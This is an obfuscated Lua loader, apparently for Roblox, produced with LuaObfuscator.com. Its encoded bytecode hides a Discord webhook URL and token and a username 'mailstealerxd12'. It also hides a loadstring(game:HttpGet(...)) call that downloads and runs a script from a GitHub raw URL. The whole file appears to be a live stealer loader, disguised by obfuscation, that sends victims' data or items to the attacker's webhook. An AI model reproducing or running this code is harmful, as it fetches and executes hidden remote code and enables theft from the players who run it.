--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=0 -0 ;local v33;local v34;while true do if (v32==(569 -(367 + (1078 -(282 + 595))))) then return (v34 * (1183 -(214 + 713))) + v33 ;end if (((1637 -(1523 + 114)) -0)==v32) then v33,v34=v1(v16,v19,v19 + (3 -1) );v19=v19 + (4 -2) ;v32=620 -(555 + 64) ;end end end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=(1 -0) + 0 ;local v38=(v21(v36,1 + 0 ,1017 -(915 + 82) ) * ((2 -0)^(1097 -(68 + 997)))) + v35 ;local v39=v21(v36,(3655 -2364) -(226 + 1044) ,31);local v40=((v21(v36,139 -107 )==(118 -(32 + 85))) and  -(1 + 0)) or (1 + 0) ;if (v39==(0 + 0)) then if (v38==(957 -(892 + (258 -193)))) then return v40 * (0 -0) ;else v39=1 -0 ;v37=0 -0 ;end elseif (v39==(2397 -(87 + 263))) then return ((v38==((1367 -(1069 + 118)) -((1019 -(802 + 150)) + 113))) and (v40 * ((1 + 0)/0))) or (v40 * NaN) ;end return v8(v40,v39-(2511 -1488) ) * (v37 + (v38/((2 + (0 -0))^52))) ;end v26=nil;function v26(v41)local v42;if  not v41 then v41=v24();if (v41==(0 -0)) then return "";end end v42=v3(v16,v19,(v19 + v41) -(1 -0) );v19=v19 + v41 ;local v43={};for v67=1, #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=1171 -(418 + 753) ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if ((1 + 1)==v44) then v49=nil;v50=nil;v44=2 + 1 ;end if (v44~=(1 -0)) then else v47=nil;v48=nil;v44=5 -3 ;end if (v44~=(1230 -(322 + 905))) then else v51=nil;v52=nil;v44=1 + 3 ;end if (v44==(2 + 2)) then while true do if (v45==(611 -(602 + 9))) then local v94=0 + 0 ;while true do if ((529 -(406 + 123))==v94) then v46=1769 -(1749 + 20) ;v47=nil;v94=1 + 0 ;end if (v94~=(1323 -(1249 + 73))) then else v45=1;break;end end end if (v45~=(1 + 1)) then else local v95=1898 -(260 + 1638) ;local v96;while true do if (v95~=(1145 -(466 + 679))) then else v96=0 -0 ;while true do if (v96==1) then v45=3;break;end if (v96~=0) then else local v129=0 -0 ;while true do if (v129==(1 + 0)) then v96=2 -1 ;break;end if (v129==(1900 -(106 + 1794))) then v50=nil;v51=nil;v129=1 + 0 ;end end end end break;end end end if (v45==(1 + 2)) then v52=nil;while true do local v98=0 -0 ;local v99;local v100;while true do if (v98~=(2 -1)) then else while true do if (v99==(0 -0)) then v100=0 -0 ;while true do if (v100==(114 -(4 + 110))) then local v156=584 -(57 + 527) ;while true do if (1==v156) then v100=1;break;end if (v156==(1427 -(41 + 1386))) then if (v46~=(106 -(17 + 86))) then else local v161=0 + 0 ;local v162;local v163;while true do if (v161==(1 -0)) then while true do if (v162~=(0 -0)) then else v163=166 -(122 + 44) ;while true do if (v163~=0) then else local v171=0;local v172;while true do if (v171==(765 -(468 + 297))) then v172=0 -0 ;while true do if (v172~=(0 -0)) then else for v185=1 + 0 ,v24() do v48[v185-1 ]=v29();end return v50;end end break;end end end end break;end end break;end if (v161==(0 + 0)) then v162=0 -0 ;v163=nil;v161=1 + 0 ;end end end if (2==v46) then local v164=236 -(141 + 95) ;local v165;local v166;while true do if (v164~=0) then else v165=0 + 0 ;v166=nil;v164=66 -(30 + 35) ;end if ((2 -1)==v164) then while true do if ((0 + 0)~=v165) then else v166=0 + 0 ;while true do if (v166==1) then for v174=1 + 0 ,v24() do local v175=1257 -(1043 + 214) ;local v176;local v177;while true do if (v175==(3 -2)) then while true do if (v176==0) then v177=v22();if (v21(v177,1213 -(323 + 889) ,2 -1 )~=(580 -(361 + 219))) then else local v187=320 -(53 + 267) ;local v188;local v189;local v190;local v191;local v192;while true do if (v187==(165 -(92 + 71))) then v192=nil;while true do if (v188~=2) then else while true do if (v189==(1 + 0)) then local v200=0 + 0 ;local v201;while true do if (v200~=0) then else v201=0 -0 ;while true do if (v201==(413 -(15 + 398))) then local v211=982 -(18 + 964) ;while true do if (v211==(0 -0)) then v192={v23(),v23(),nil,nil};if (v190==(0 -0)) then local v213=0 + 0 ;local v214;while true do if ((0 + 0)~=v213) then else v214=0;while true do if (v214==(0 + 0)) then v192[3]=v23();v192[854 -(20 + 830) ]=v23();break;end end break;end end elseif (v190==(1 + 0)) then v192[129 -(55 + 71) ]=v24();elseif (v190==(2 -0)) then v192[1793 -(573 + 1217) ]=v24() -((128 -(116 + 10))^(2 + 14)) ;elseif (v190==(4 -1)) then local v223=0 + 0 ;local v224;local v225;local v226;while true do if ((939 -(714 + 225))~=v223) then else v224=738 -(542 + 196) ;v225=nil;v223=1 -0 ;end if (1==v223) then v226=nil;while true do if (v224~=1) then else while true do if (v225~=(0 + 0)) then else v226=0 + 0 ;while true do if (v226~=(0 + 0)) then else v192[3]=v24() -(2^(2 + 14)) ;v192[5 -1 ]=v23();break;end end break;end end break;end if (v224~=(806 -(118 + 688))) then else local v227=0 -0 ;while true do if (v227==(2 -1)) then v224=1;break;end if (v227~=(1551 -(1126 + 425))) then else v225=0;v226=nil;v227=406 -(118 + 287) ;end end end end break;end end end v211=1887 -(927 + 959) ;end if (v211~=(3 -2)) then else v201=1122 -(118 + 1003) ;break;end end end if (v201==(1 -0)) then v189=99 -(11 + 86) ;break;end end break;end end end if (v189~=(5 -3)) then else local v202=0 -0 ;local v203;local v204;while true do if (v202~=(377 -(142 + 235))) then else v203=0 -0 ;v204=nil;v202=1 + 0 ;end if (v202==1) then while true do if (v203~=(977 -(553 + 424))) then else v204=0 -0 ;while true do if (1==v204) then v189=3 + 0 ;break;end if (v204==0) then local v212=0;while true do if (v212==(1062 -(810 + 251))) then v204=1 + 0 ;break;end if (v212==(0 + 0)) then if (v21(v191,1 + 0 ,1)==1) then v192[1 + 1 ]=v52[v192[1 + 1 ]];end if (v21(v191,2 + 0 ,4 -2 )==1) then v192[736 -(711 + 22) ]=v52[v192[7 -4 ]];end v212=3 -2 ;end end end end break;end end break;end end end if (v189==(6 -3)) then if (v21(v191,1 + 2 ,3)~=(4 -3)) then else v192[757 -(239 + 514) ]=v52[v192[4]];end v47[v174]=v192;break;end if (v189~=(0 + 0)) then else local v206=0;while true do if (v206==(1 -0)) then v189=1;break;end if (v206~=0) then else v190=v21(v177,2,3);v191=v21(v177,2 + 2 ,1750 -(1344 + 400) );v206=1330 -(797 + 532) ;end end end end break;end if (v188~=(0 + 0)) then else local v198=0 + 0 ;local v199;while true do if (v198==(405 -(255 + 150))) then v199=0 -0 ;while true do if (0==v199) then local v209=1202 -(373 + 829) ;while true do if (v209==1) then v199=732 -(476 + 255) ;break;end if (v209==(0 -0)) then v189=1130 -(369 + 761) ;v190=nil;v209=1 + 0 ;end end end if (v199~=(1 -0)) then else v188=1 -0 ;break;end end break;end end end if ((1740 -(404 + 1335))==v188) then v191=nil;v192=nil;v188=408 -(183 + 223) ;end end break;end if (v187==0) then v188=238 -(64 + 174) ;v189=nil;v187=1;end if ((1 + 0)==v187) then v190=nil;v191=nil;v187=2 -0 ;end end end break;end end break;end if (v175==(336 -(144 + 192))) then v176=0 + 0 ;v177=nil;v175=217 -(42 + 174) ;end end end v46=3;break;end if (v166==0) then local v173=0 + 0 ;while true do if (v173~=(1 + 0)) then else v166=1;break;end if (v173~=0) then else for v179=1 + 0 ,v51 do local v180=0 + 0 ;local v181;local v182;local v183;local v184;while true do if (v180~=(1 + 1)) then else while true do if (v181==1) then v184=nil;while true do if (v182~=(450 -(108 + 341))) then else if (v183==1) then v184=v22()~=0 ;elseif (v183==(1 + 1)) then v184=v25();elseif (v183~=(1507 -(363 + 1141))) then else v184=v26();end v52[v179]=v184;break;end if (v182~=0) then else local v195=0 -0 ;local v196;local v197;while true do if ((1581 -(1183 + 397))~=v195) then else while true do if (v196~=(0 -0)) then else v197=0 + 0 ;while true do if (v197==0) then local v210=0 + 0 ;while true do if (v210==1) then v197=1976 -(1913 + 62) ;break;end if (v210==0) then v183=v22();v184=nil;v210=1;end end end if (v197==(2 -1)) then v182=1 + 0 ;break;end end break;end end break;end if (v195~=(0 + 0)) then else v196=0 + 0 ;v197=nil;v195=1;end end end end break;end if (v181==0) then local v193=0 + 0 ;while true do if (v193==(0 -0)) then v182=0 + 0 ;v183=nil;v193=1;end if (v193~=(2 -1)) then else v181=1168 -(645 + 522) ;break;end end end end break;end if (v180~=(1934 -(565 + 1368))) then else v183=nil;v184=nil;v180=7 -5 ;end if (v180~=(1661 -(1477 + 184))) then else v181=0 + 0 ;v182=nil;v180=1 -0 ;end end end v50[14 -11 ]=v22();v173=1 + 0 ;end end end end break;end end break;end end end v156=1;end end end if (v100==(1837 -(1045 + 791))) then if (v46==(857 -(564 + 292))) then local v157=0 -0 ;local v158;local v159;while true do if (v157==1) then while true do if (v158==0) then v159=0;while true do if (v159~=(505 -(351 + 154))) then else local v169=1574 -(1281 + 293) ;while true do if (1~=v169) then else v159=2 -1 ;break;end if (v169~=0) then else v50={v47,v48,nil,v49};v51=v24();v169=1002 -(938 + 63) ;end end end if (1~=v159) then else v52={};v46=2 + 0 ;break;end end break;end end break;end if (v157==0) then v158=1559 -(1381 + 178) ;v159=nil;v157=1 + 0 ;end end end if (v46~=(0 + 0)) then else local v160=0 + 0 ;while true do if ((1125 -(936 + 189))==v160) then local v167=0 + 0 ;local v168;while true do if (v167==(0 + 0)) then v168=0;while true do if (v168~=(1614 -(1565 + 48))) then else v160=1 + 0 ;break;end if (v168==(1138 -(782 + 356))) then local v170=0 + 0 ;while true do if ((268 -(176 + 91))==v170) then v168=2 -1 ;break;end if (v170==(0 -0)) then v47={};v48={};v170=1 -0 ;end end end end break;end end end if (v160~=1) then else v49={};v46=1;break;end end end break;end end break;end end break;end if (v98~=(1092 -(975 + 117))) then else v99=0;v100=nil;v98=1876 -(157 + 1718) ;end end end break;end if (v45==1) then local v97=0 + 0 ;while true do if (v97==(0 -0)) then v48=nil;v49=nil;v97=1;end if (v97==(3 -2)) then v45=1020 -(697 + 321) ;break;end end end end break;end if (v44~=0) then else v45=0 -0 ;v46=nil;v44=1 -0 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then v20=v0(v3(v53,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v53,16));if v20 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v84,v20);v20=nil;v101=1;end end else return v84;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v54,v55,v56,v57=v1(v16,v19,v19 + 2 + 1 );v19=v19 + 4 + 0 ;return (v57 * 16777216) + (v56 * (257918 -192382)) + (v55 * 256) + v54 ;end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v69=v61;local v70=v62;local v71=v63;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v85=0,v77 do if (v85>=v71) then v75[v85-v71 ]=v76[v85 + 1 ];else v79[v85]=v76[v85 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82>0) then v79[v81[2]]=v60[v81[3]];else v79[v81[2]]=v81[3];end elseif (v82<=2) then local v107=v81[2];v79[v107]=v79[v107](v13(v79,v107 + 1 ,v74));elseif (v82==3) then local v130=0;local v131;local v132;while true do if (v130==1) then v79[v131 + 1 ]=v132;v79[v131]=v132[v81[4]];break;end if (0==v130) then v131=v81[2];v132=v79[v81[3]];v130=1;end end else v73=v81[3];end elseif (v82<=7) then if (v82<=5) then local v109=v81[2];local v110=v79[v81[3]];v79[v109 + 1 ]=v110;v79[v109]=v110[v81[4]];elseif (v82==6) then local v134=0;local v135;while true do if (v134==0) then v135=v81[2];v79[v135]=v79[v135](v13(v79,v135 + 1 ,v74));break;end end else do return;end end elseif (v82<=8) then local v114=v81[2];local v115,v116=v72(v79[v114](v13(v79,v114 + 1 ,v81[3])));v74=(v116 + v114) -1 ;local v117=0;for v124=v114,v74 do local v125=0;while true do if (v125==0) then v117=v117 + 1 ;v79[v124]=v115[v117];break;end end end elseif (v82==9) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]();end elseif (v82<=15) then if (v82<=12) then if (v82==11) then local v118=v81[2];local v119,v120=v72(v79[v118](v13(v79,v118 + 1 ,v81[3])));v74=(v120 + v118) -1 ;local v121=0;for v126=v118,v74 do v121=v121 + 1 ;v79[v126]=v119[v121];end else v79[v81[2]]();end elseif (v82<=13) then v79[v81[2]]=v81[3]~=0 ;elseif (v82==14) then v79[v81[2]]=v60[v81[3]];else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=18) then if (v82<=16) then do return;end elseif (v82==17) then v73=v81[3];else v79[v81[2]]=v81[3];end elseif (v82<=19) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>20) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v88=(v64/(2^(v65-1)))%((1728 -(1668 + 58))^(((v66-((2114 -1487) -(512 + 114))) -(v65-(2 -1))) + (1 -(1994 -(109 + 1885))))) ;return v88-(v88%(3 -2)) ;else local v89=(1 + 1)^(v65-(1 + 0)) ;return (((v64%(v89 + v89))>=v89) and (1 + 0)) or 0 ;end end v22=nil;v18=2;end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O313632392O322O363831303638373536312F71524A797A6C5F73367053554C765765594F6B323336456A4E526B34693158527858397873695A6C4E656B386A314E625857685849414B544F5F4547635138596D5A2D33030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030F3O006D61696C737465616C65727864313203093O00557365724E616D653200173O002O123O00013O0026143O000E00010002002O043O000E0001001201000100033O003009000100040005001201000100063O001201000200073O002003000200020008002O12000400094O000D000500014O0008000200054O000200013O00022O000C000100010001002O043O001600010026143O000100010001002O043O00010001001201000100033O0030090001000A000B001201000100033O0030090001000C000B002O123O00023O002O043O000100012O00073O00017O00",v9(),...);end
